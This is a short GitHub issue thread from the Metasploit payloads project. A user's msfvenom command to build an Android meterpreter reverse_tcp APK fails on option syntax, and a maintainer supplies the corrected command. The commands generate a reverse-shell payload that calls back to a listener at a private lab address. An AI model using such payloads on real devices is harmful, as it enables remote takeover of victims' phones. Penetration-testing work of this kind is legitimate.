### ISSUE TITLE
@RUDIANT0 Please help me 

### ISSUE THREAD

**Issue by mohdali234** [rapid7/metasploit-payloads#629]
┌──(root㉿kali)-[/home/kali]
└─# msfvenom -p android/meterpreter/reverse_tcp LHOST = 10.0.2.15 LPORT = 8484 > sido.apk

[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: One or more options failed to validate: LHOST, LPORT.
                                                             
_Originally posted by @h00die in https://github.com/rapid7/metasploit-framework/issues/11825#issuecomment-657307421_

**Comment by h00die** [comment]
reading the last line where it says error, it looks like your `lhost` and `lport` didn't validate.  That's because you can't have a space between it and the `=`.  Try `msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=8484 -o sido.apk`
